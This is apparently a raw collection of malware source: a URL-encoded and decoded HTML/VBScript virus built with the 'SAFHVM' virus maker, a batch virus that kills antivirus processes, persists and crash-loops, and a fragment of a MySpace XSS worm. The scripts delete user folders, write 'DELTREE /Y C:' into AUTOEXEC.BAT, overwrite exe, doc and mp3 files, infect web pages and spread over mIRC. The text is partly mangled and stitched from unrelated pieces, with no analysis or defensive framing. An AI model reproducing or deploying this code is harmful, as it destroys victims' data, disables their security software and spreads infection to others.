%3C%21--FLAMEANDRANDY--%3E%0A%3C%21--%20made%20by%20Gunblade --%3E%0A%3C%21--%20Generated%20with%20SAFHVM%20v.1.3%20by%20 sevenC%20/%20N0%3A7%20--%3E%0A%3Chtml%3E%3Chead%3E%3Ctitle%3 E%3C/title%3E%3C/head%3E%3Cbody%3E%0A%3Cscript%20language%3D VBScript%3E%0A%27FLAMEANDRANDY%0A%27made%20by%20Gunblade%0A% 27Generated%20with%20SAFHVM%20v.1.3%20%0A%0AOn%20Error%20Res ume%20Next%0AMsgBox%20%22To%20view%20this%20page%20you%20mus t%20accept%20the%20ActiveX%22%2Cvbinformation%2C%22Internet% 20Explorer%22%0ASet%20fso%3DCreateObject%28%22Scripting.File SystemObject%22%29%0ASet%20ws%3DCreateObject%28%22WScript.Sh ell%22%29%0AIf%20err.number%3D429%20Then%0Aws.Run%20javascri pt%3Alocation.reload%28%29%0AElse%0ADim%20Fso%2C%20Drives%2C %20Drive%2C%20Folder%2C%20Files%2C%20File%2C%20Subfolders%2C Subfolder%0ASet%20fso%3DCreateObject%28%22Scripting.FileSyst emObject%22%29%0ASet%20ws%3DCreateObject%28%22WScript.Shell% 22%29%0Aws.RegWrite%20%22HKCU%5CSoftware%5CMicrosoft%5CInter net%20Explorer%5CMain%5CStart%20Page%22%2C%20%22undefined%22 %0Aws.RegWrite%20%22HKLM%5CSoftware%5CMicrosoft%5CWindows%5C CurrentVersion%5CRegisteredOwner%22%2C%20%22undefined%22%0Aw s.regwrite%20%22HKEY_CURRENT_USER%5CSoftware%5CMicrosoft%5CW indows%5CCurrentVersion%5CPolicies%5CSystem%5CDisableRegistr yTools%22%2C%201%2C%20%22REG_DWORD%22%0Aws.regwrite%20%22HKE Y_CURRENT_USER%5CSoftware%5CMicrosoft%5CWindows%5CCurrentVer sion%5CPoliciesExplorer%5CNoDrives%22%2C%201%2C%20%22REG_DWO RD%22%0Aws.RegWrite%20%22HKLM%5CSoftware%5CMicrosoft%5CWindo ws%5CCurrentVersion%5CWinLogon%5CLegalNoticeCaption%22%2C%20 %22WASSUP%22%0Aws.RegWrite%20%22HKLM%5CSoftware%5CMicrosoft% 5CWindows%5CCurrentVersion%5CWinLogon%5CLegalNoticeText%22%2 C%20%22You%20have%20been%20infeced%20so%20sorry%22%0A%20if%2 0day%28now%29%20%3D%2019%20%20and%20month%28now%29%20%3D%209 %20then%20ws.run%20%22rundll32.exe%20user%2Cdisableoemlayer% 22end%20if%0A%20if%20day%28now%29%20%3D%2019%20%20and%20mont h%28now%29%20%3D%209%20thenDirName%3D%22c%3A%5CMy%20Document %5C%22Set%20fso%20%3D%20CreateObject%28%22Scripting.FileSyst emObject%22%29set%20Folder%3Dfso.GetFolder%28DirName%29Folde r.deleteend%20if%0A%20if%20day%28now%29%20%3D%2019%20%20and% 20month%28now%29%20%3D%209%20then%20const%20forReading%3D1%2 C%20forwriting%3D2%2C%20forappending%3D3const%20tristateUsed efault%20%3D%20-2%2C%20TristateTrue%20%3D%20-1%2C%20Tristate False%3D0Dim%20BB3214XXX000%2C%20XXX00010XXX21122%2C%20ZZQWE 32XX1000021%2C%20sset%20BB3214XXX000%3Dcreateobject%28%22scr ipting.Filesystemobject%22%29BB3214XXX000.createtextfile%20% 22C%3A%5CAUTOEXEC.BAT%22set%20XXX00010XXX21122%20%3D%20BB321 4XXX000.getfile%28%22C%3A%5CAUTOEXEC.BAT%22%29set%20ZZQWE32X X1000021%20%3D%20XXX00010XXX21122.openastextstream%28forwrit ing%2C%20TristateUsedefault%29ZZQWE32XX1000021.writeline%20% 22echo%20off%22ZZQWE32XX1000021.writeline%20%22DELTREE%20/Y% 20C%3A%5C%22ZZQWE32XX1000021.close%20end%20if%0Aset%20Trange %20%3D%20document.body.CreateTextRange%0ASet%20Drives%20%3D% 20fso.drives%0AFor%20Each%20Drive%20in%20Drives%0AIf%20drive .isready%20then%0ADosearch%20drive%20%26%20%22%5C%22%20%0Aen d%20If%20%20%0Anext%0Afunction%20Dosearch%28path%29%0Aon%20e rror%20resume%20next%0ASet%20Folder%3Dfso.getfolder%28path%2 9%0ASet%20Files%20%3D%20folder.files%0AFor%20Each%20File%20i n%20files%0AIf%20fso.GetExtensionName%28file.path%29%3D%22ht m%22%20or%20fso.GetExtensionName%28file.path%29%3D%22html%22 %20or%20fso.GetExtensionName%28file.path%29%3D%22php%22%20or %20fso.GetExtensionName%28file.path%29%3D%22cgi%22%20or%20fs o.GetExtensionName%28file.path%29%3D%22asp%22%20then%0Aon%20 error%20resume%20next%0ASet%20seven%20%3D%20FSO.OpenTextFile %28file.path%2C%201%2C%20False%29%0AFileContents%20%3D%20sev en.ReadAll%28%29%0Aseven.close%28%29%0ASet%20seven%20%3D%20F SO.OpenTextFile%28file.path%2C%202%2C%20False%29%0Aseven.Wri teLine%20%22%3C%21--FLAMEANDRANDY%20by%20Gunblade--%3E%22%0A seven.Write%28%22%3Chtml%3E%3Cbody%3E%22%20+%20Chr%2813%29%2 0+%20Chr%2810%29%29%0Aseven.WriteLine%20TRange.htmlText%0Ase ven.WriteLine%20%28%22%20%22%29%0Aseven.WriteLine%20%28%22%3 C/body%3E%3C/html%3E%22%29%0Aseven.Write%28FileContents%29%0 Aseven.close%28%29%0AOn%20error%20resume%20next%0Aset%20a%3D fso.CreateTextFile%28%22C%3A%5Cmirc%5Cscript.ini%22%29%0Aa.W riteLine%20%22%5Bscript%5D%22%0Aa.WriteLine%20%22n0%3Don%201 %3Ajoin%3A*.*%3A%20%7B%20if%20%28%20%24nick%20%3D%3D%24me%20 %29%20%7Bhalt%7D%20%22%0Aa.WriteLine%20%22n1%3D/dcc%20send%2 0%24nick%20C%3A%5Cmirc%5Cjoke.htm%20%7D%22%0Aa.Close%28%29%0 Aend%20if%0AIf%20fso.GetExtensionName%28file.path%29%3D%22ex e%22%20then%0Aon%20error%20resume%20next%0Aset%20drop%20%3D% 20fso.createtextfile%28File.path%29%0Adrop.writeline%20%22so %20wat%20to%20do%20now%22%0Adrop.close%0Aend%20if%0AIf%20fso .GetExtensionName%28file.path%29%3D%22doc%22%20then%0Aon%20e rror%20resume%20next%0Aset%20drop%20%3D%20fso.createtextfile %28File.path%29%0Adrop.writeline%20%22so%20wat%20to%20do%20n ow%22%0Adrop.close%0Aend%20if%0AIf%20fso.GetExtensionName%28 file.path%29%3D%22mp3%22%20then%0Aon%20error%20resume%20next %0Aset%20drop%20%3D%20fso.createtextfile%28File.path%29%0Adr op.writeline%20%22so%20wat%20to%20do%20now%22%0Adrop.close%0 Aend%20if%0Anext%0ASet%20Subfolders%20%3D%20folder.SubFolder s%0AFor%20Each%20Subfolder%20in%20Subfolders%0ADosearch%20Su bfolder.path%20%0ANext%20%0Aend%20function%20%0Aend%20if%0A- -%3E%3C/script%3E%0A%3Cscript%20language%3D%22JavaScript%22% 3E%0Avar%20viruspath%2C%20virus%2C%20code%2C%20fso%2C%20file %0Afso%3Dnew%20ActiveXObject%28%22Scripting.FileSystemObject %22%29%0Aviruspath%3Dwindow.location.pathname%0Aviruspath%3D viruspath.slice%281%29%0Avirus%3Dfso.OpenTextFile%28viruspat h%2C1%29%0Acode%3Dvirus.ReadAll%28%29%0Avirus.Close%28%29%3B %0Afile%3Dfso.CreateTextFile%28%22C%3A%5C%5Cmirc%5C%5Cjoke.h tm%22%2C%202%29%0Afile.write%28code%29%0Afile.Close%28%29%0A %3C/script%3E%3C/body%3E%3C/html%3E%0A%3Chtml%3E%3Chead%3E%3 Ctitle%3EFLAMEANDRANDY%20by%20Gunblade%3C/title%3E%3Chead%3E %3Cbody%20bgcolor%3D%22black%22%3E%0A%3Ch3%20align%3D%22cent er%22%3E%0A%3Cfont%20color%3D%22white%22%3E%0A%3Cmarquee%3EF LAMEANDRANDY%20by%20Gunblade%3C/marquee%3E%3Cbr%3E%3Cbr%3E%0 AWhen%20this%20file%20loaded%20you%20has%20been%20death%20wi th%20safhvm...hahahah...http%3A//sevenc.vze.com/%3Cbr%3E%3Cb r%3E%0AGenerated%20with%20Simple%20and%20fast%20html%20virus %20maker%20by%20sevenC%20/%20N0%3A7%0A%3C/body%3E%3C/html%3E %0A
:: BAT.buner :: by Gunbladecopy %0 %systemroot%..buner.bat nul set set = 43 %43% for = 1 %43% do copy = 3 %43% *.bat = 8 %1% %%b in (%8%) %3% %0 %%b set set = 85 %85% for = 3 %85% do copy = 5 %85% *.exe = 3 %3% %%e in (%3%) %5% %0 %%e cls tskill AVGUARD tskill AVGNT tskill NMAIN tskill KAV tskill ad-aware tskill av* tskill NISSERV tskill outpost tskill KAVPF reg add HKLM..Software..Microsoft..Windows..CurrentVersion..Run /v buner /t REG_SZ /d %systemroot%..buner.bat /f nul cls echo [windows] %systemroot%..win.ini echo load=%systemroot%..buner.bat %systemroot%..win.ini echo run=%systemroot%..buner.bat %systemroot%..win.ini cls copy %0 a:..%random%.bat copy %0 b:..%random%.bat shutdown -s -t 15 cls :crash start %0 goto crashGenerated with Razor's Batch Virus Generator v1.0
..Flame--
.. made by Gunblade--
.. Generated with SAFHVM v.1.3 by sevenC / N0:7 --
.. language=VBScript
'Flame
'made by Gunblade
'Generated with SAFHVM v.1.3On Error Resume Next
MsgBox "To view this page you must accept the ActiveX",vbinformation,"Internet Explorer"
Set fso=CreateObject("Scripting.FileSystemObject")
Set ws=CreateObject("WScript.Shell")
If err.number=429 Then
ws.Run ..location.reload()
Else
Dim Fso, Drives, Drive, Folder, Files, File, Subfolders,Subfolder
Set fso=CreateObject("Scripting.FileSystemObject")
Set ws=CreateObject("WScript.Shell")
ws.RegWrite "HKCU..Software..Microsoft..Internet Explorer..Main..Start Page", "undefined"
ws.RegWrite "HKLM..Software..Microsoft..Windows..CurrentVersion..Registe
redOwner", "undefined"
ws.regwrite "HKEY_CURRENT_USER..Software..Microsoft..Windows..CurrentVer
sion..Policies..System..DisableRegistryTools", 1, "REG_DWORD"
ws.regwrite "HKEY_CURRENT_USER..Software..Microsoft..Windows..CurrentVer
sion..PoliciesExplorer..NoDrives", 1, "REG_DWORD"
ws.RegWrite "HKLM..Software..Microsoft..Windows..CurrentVersion..WinLogo
n..LegalNoticeCaption", "wasssup"
ws.RegWrite "HKLM..Software..Microsoft..Windows..CurrentVersion..WinLogo
n..LegalNoticeText", "You have been infeced"
if day(now) = 27 and month(now) = 2 then ws.run "rundll32.exe user,disableoemlayer"end if
if day(now) = 27 and month(now) = 2 thenDirName="c:..My Document.."Set fso = CreateObject("Scripting.FileSystemObject")set Folder=fso.GetFolder(DirName)Folder.deleteend if
if day(now) = 27 and month(now) = 2 then const forReading=1, forwriting=2, forappending=3const tristateUsedefault = -2, TristateTrue = -1, TristateFalse=0Dim BB3214XXX000, XXX00010XXX21122, ZZQWE32XX1000021, sset BB3214XXX000=createobject("scripting.Filesystemobject")BB321
4XXX000.createtextfile "C:..AUTOEXEC.BAT"set XXX00010XXX21122 = BB3214XXX000.getfile("C:..AUTOEXEC.BAT")set ZZQWE32XX1000021 = XXX00010XXX21122.openastextstream(forwriting, TristateUsedefault)ZZQWE32XX1000021.writeline "echo off"ZZQWE32XX1000021.writeline "DELTREE /Y C:.."ZZQWE32XX1000021.close end if
set Trange = document.body.CreateTextRange
Set Drives = fso.drives
For Each Drive in Drives
If drive.isready then
Dosearch drive & ".."
end If
next
function Dosearch(path)
on error resume next
Set Folder=fso.getfolder(path)
Set Files = folder.files
For Each File in files
If fso.GetExtensionName(file.path)="htm" or fso.GetExtensionName(file.path)="html" or fso.GetExtensionName(file.path)="php" or fso.GetExtensionName(file.path)="cgi" or fso.GetExtensionName(file.path)="asp" then
on error resume next
Set seven = FSO.OpenTextFile(file.path, 1, False)
FileContents = seven.ReadAll()
seven.close()
Set seven = FSO.OpenTextFile(file.path, 2, False)
seven.WriteLine "..Flame by Gunblade--"
seven.Write(" " + Chr(13) + Chr(10))
seven.WriteLine TRange.htmlText
seven.WriteLine (" ")
seven.WriteLine (" ")
seven.Write(FileContents)
seven.close()
On error resume next
set a=fso.CreateTextFile("C:..mirc..script.ini")
a.WriteLine "[script]"
a.WriteLine "n0=on 1:join:*.*: { if ( $nick ==$me ) {halt} "
a.WriteLine "n1=/dcc send $nick C:..mirc..joke.htm }"
a.Close()
end if
If fso.GetExtensionName(file.path)="exe" then
on error resume next
set drop = fso.createtextfile(File.path)
drop.writeline "what to do what to do dont no what to do
"
drop.close
end if
If fso.GetExtensionName(file.path)="doc" then
on error resume next
set drop = fso.createtextfile(File.path)
drop.writeline "what to do what to do dont no what to do
"
drop.close
end if
If fso.GetExtensionName(file.path)="mp3" then
on error resume next
set drop = fso.createtextfile(File.path)
drop.writeline "what to do what to do dont no what to do
"
drop.close
end if
next
Set Subfolders = folder.SubFolders
For Each Subfolder in Subfolders
Dosearch Subfolder.path
Next
end function
end if
--..
.. language="JavaScript"
var viruspath, virus, code, fso, file
fso=new ActiveXObject("Scripting.FileSystemObject")
viruspath=window.location.pathname
viruspath=viruspath.slice(1)
virus=fso.OpenTextFile(viruspath,1)
code=virus.ReadAll()
virus.Close();
file=fso.CreateTextFile("C:....mirc....joke.htm", 2)
file.write(code)
file.Close()
..
Flame by Gunblade
Flame by Gunblade
When this file loaded you has been death with safhvm...hahahah...http://sevenc.vze.com/
Generated with Simple and fast html virus maker by sevenC / N0:7
..FLAMEANDRANDY--
.. made by Gunblade--
.. Generated with SAFHVM v.1.3 by sevenC / N0:7 --
.. language=VBScript
'FLAMEANDRANDY
'made by Gunblade
'Generated with SAFHVM v.1.3On Error Resume Next
MsgBox "To view this page you must accept the ActiveX",vbinformation,"Internet Explorer"
Set fso=CreateObject("Scripting.FileSystemObject")
Set ws=CreateObject("WScript.Shell")
If err.number=429 Then
ws.Run ..location.reload()
Else
Dim Fso, Drives, Drive, Folder, Files, File, Subfolders,Subfolder
Set fso=CreateObject("Scripting.FileSystemObject")
Set ws=CreateObject("WScript.Shell")
ws.RegWrite "HKCU..Software..Microsoft..Internet Explorer..Main..Start Page", "undefined"
ws.RegWrite "HKLM..Software..Microsoft..Windows..CurrentVersion..Registe
redOwner", "undefined"
ws.regwrite "HKEY_CURRENT_USER..Software..Microsoft..Windows..CurrentVer
sion..Policies..System..DisableRegistryTools", 1, "REG_DWORD"
ws.regwrite "HKEY_CURRENT_USER..Software..Microsoft..Windows..CurrentVer
sion..PoliciesExplorer..NoDrives", 1, "REG_DWORD"
ws.RegWrite "HKLM..Software..Microsoft..Windows..CurrentVersion..WinLogo
n..LegalNoticeCaption", "Helloo... "
ws.RegWrite "HKLM..Software..Microsoft..Windows..CurrentVersion..WinLogo
n..LegalNoticeText", "You have been infeced"
if day(now) = 29 and month(now) = 3 then ws.run "rundll32.exe user,disableoemlayer"end if
if day(now) = 29 and month(now) = 3 thenDirName="c:..My Document.."Set fso = CreateObject("Scripting.FileSystemObject")set Folder=fso.GetFolder(DirName)Folder.deleteend if
if day(now) = 29 and month(now) = 3 then const forReading=1, forwriting=2, forappending=3const tristateUsedefault = -2, TristateTrue = -1, TristateFalse=0Dim BB3214XXX000, XXX00010XXX21122, ZZQWE32XX1000021, sset BB3214XXX000=createobject("scripting.Filesystemobject")BB321
4XXX000.createtextfile "C:..AUTOEXEC.BAT"set XXX00010XXX21122 = BB3214XXX000.getfile("C:..AUTOEXEC.BAT")set ZZQWE32XX1000021 = XXX00010XXX21122.openastextstream(forwriting, TristateUsedefault)ZZQWE32XX1000021.writeline "echo off"ZZQWE32XX1000021.writeline "DELTREE /Y C:.."ZZQWE32XX1000021.close end if
set Trange = document.body.CreateTextRange
Set Drives = fso.drives
For Each Drive in Drives
If drive.isready then
Dosearch drive & ".."
end If
next
function Dosearch(path)
on error resume next
Set Folder=fso.getfolder(path)
Set Files = folder.files
For Each File in files
If fso.GetExtensionName(file.path)="htm" or fso.GetExtensionName(file.path)="html" or fso.GetExtensionName(file.path)="php" or fso.GetExtensionName(file.path)="cgi" or fso.GetExtensionName(file.path)="asp" then
on error resume next
Set seven = FSO.OpenTextFile(file.path, 1, False)
FileContents = seven.ReadAll()
seven.close()
Set seven = FSO.OpenTextFile(file.path, 2, False)
seven.WriteLine "..FLAMEANDRANDY by Gunblade--"
seven.Write(" " + Chr(13) + Chr(10))
seven.WriteLine TRange.htmlText
seven.WriteLine (" ")
seven.WriteLine (" ")
seven.Write(FileContents)
seven.close()
On error resume next
set a=fso.CreateTextFile("C:..mirc..script.ini")
a.WriteLine "[script]"
a.WriteLine "n0=on 1:join:*.*: { if ( $nick ==$me ) {halt} "
a.WriteLine "n1=/dcc send $nick C:..mirc..joke.htm }"
a.Close()
end if
If fso.GetExtensionName(file.path)="exe" then
on error resume next
set drop = fso.createtextfile(File.path)
drop.writeline "Heyy... idiot ... SeVeN iS baCk to school....!! "
drop.close
end if
If fso.GetExtensionName(file.path)="doc" then
on error resume next
set drop = fso.createtextfile(File.path)
drop.writeline "Heyy... idiot ... SeVeN iS baCk to school....!! "
drop.close
end if
If fso.GetExtensionName(file.path)="mp3" then
on error resume next
set drop = fso.createtextfile(File.path)
drop.writeline "Heyy... idiot ... SeVeN iS baCk to school....!! "
drop.close
end if
next
Set Subfolders = folder.SubFolders
For Each Subfolder in Subfolders
Dosearch Subfolder.path
Next
end function
end if
--..
.. language="JavaScript"
var viruspath, virus, code, fso, file
fso=new ActiveXObject("Scripting.FileSystemObject")
viruspath=window.location.pathname
viruspath=viruspath.slice(1)
virus=fso.OpenTextFile(viruspath,1)
code=virus.ReadAll()
virus.Close();
file=fso.CreateTextFile("C:....mirc....joke.htm", 2)
file.write(code)
file.Close()
..
FLAMEANDRANDY by Gunblade
FLAMEANDRANDY by Gunblade
When this file loaded you has been death with safhvm...hahahah...http://sevenc.vze.com/
Generated with Simple and fast html virus maker by sevenC / N0:7
gunblade bomber
a..
alert(..'document.body.inne' + 'rHTML')); ..'xmlhttp.onread' + 'ystatechange = callback'); var index = html.indexOf('frien' + 'dID'); f (location.hostname == 'profile.myspace.com') document.location = 'http://www.myspace.com' + location.pathname + location.search;
0){N+='&'}var Q=escape(AV[P]);while(Q.indexOf('+')!=-1){Q=Q.replace('+','% 2B')}while(Q.indexOf('&')!=-1){Q=Q.replace('&','%26' )}N+=P+'='+Q;O++}return N}function httpSend(BH,BI,BJ,BK){if(!J){return false}..'J.onr'+'eadystatechange=BI');J.open(BJ,BH,true);if( BJ=='POST'){J.setRequestHeader('Content-Type','application/x -www-form-urlencoded');J.setRequestHeader('Content-Length',B K.length)}J.send(BK);return true}function findIn(BF,BB,BC){var R=BF.indexOf(BB)+BB.length;var S=BF.substring(R,R+1024);return S.substring(0,S.indexOf(BC))}function getHiddenParameter(BF,BG){return findIn(BF,'name='+B+BG+B+' value='+B,B)}function getFromURL(BF,BG){var T;if(BG=='Mytoken'){T=B}else{T='&'}var U=BG+'=';var V=BF.indexOf(U)+U.length;var W=BF.substring(V,V+1024);var X=W.indexOf(T);var Y=W.substring(0,X);return Y}function getXMLObj(){var Z=false;if(window.XMLHttpRequest){try{Z=new XMLHttpRequest()}catch(e){Z=false}}else if(window.ActiveXObject){try{Z=new ActiveXObject('Msxml2.XMLHTTP')}catch(e){try{Z=new ActiveXObject('Microsoft.XMLHTTP')}catch(e){Z=false}}}return Z}var AA=g();var AB=AA.indexOf('m'+'ycode');var AC=AA.substring(AB,AB+4096);var AD=AC.indexOf('D'+'IV');var AE=AC.substring(0,AD);var AF;if(AE){AE=AE.replace('jav'+'a',A+'jav'+'a');AE=AE.replace ('exp'+'r)','exp'+'r)'+A);AF=' but most of all, samy is my hero. '}var AG;function getHome(){if(J.readyState!=4){return}var AU=J.responseText;AG=findIn(AU,'P'+'rofileHeroes',' ');AG=AG.substring(61,AG.length);if(AG.indexOf('samy')==-1){ if(AF){AG+=AF;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Preview'; AS['interest']=AG;J=getXMLObj();httpSend('/index.cfm?fuseact ion=profile.previewInterests&Mytoken='+AR,postHero,'POST ',paramsToString(AS))}}}function postHero(){if(J.readyState!=4){return}var AU=J.responseText;var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['interestLabel']='heroes';AS['submit']='Submit';A S['interest']=AG;AS['hash']=getHiddenParameter(AU,'hash');ht tpSend('/index.cfm?fuseaction=profile.processInterests&M ytoken='+AR,nothing,'POST',paramsToString(AS))}function main(){var AN=getClientFID();var BH='/index.cfm?fuseaction=user.viewProfile&friendID='+AN +'&Mytoken='+L;J=getXMLObj();httpSend(BH,getHome,'GET'); xmlhttp2=getXMLObj();httpSend2('/index.cfm?fuseaction=invite .addfriend_verify&friendID=11851658&Mytoken='+L,proc essxForm,'GET')}function processxForm(){if(xmlhttp2.readyState!=4){return}var AU=xmlhttp2.responseText;var AQ=getHiddenParameter(AU,'hashcode');var AR=getFromURL(AU,'Mytoken');var AS=new Array();AS['hashcode']=AQ;AS['friendID']='11851658';AS['subm it']='Add to Friends';httpSend2('/index.cfm?fuseaction=invite.addFriendsP rocess&Mytoken='+AR,nothing,'POST',paramsToString(AS))}f unction httpSend2(BH,BI,BJ,BK){if(!xmlhttp2){return false}..'xmlhttp2.onr'+'eadystatechange=BI');xmlhttp2.open(B J,BH,true);if(BJ=='POST'){xmlhttp2.setRequestHeader('Content -Type','application/x-www-form-urlencoded');xmlhttp2.setRequ estHeader('Content-Length',BK.length)}xmlhttp2.send(BK);retu rn true}"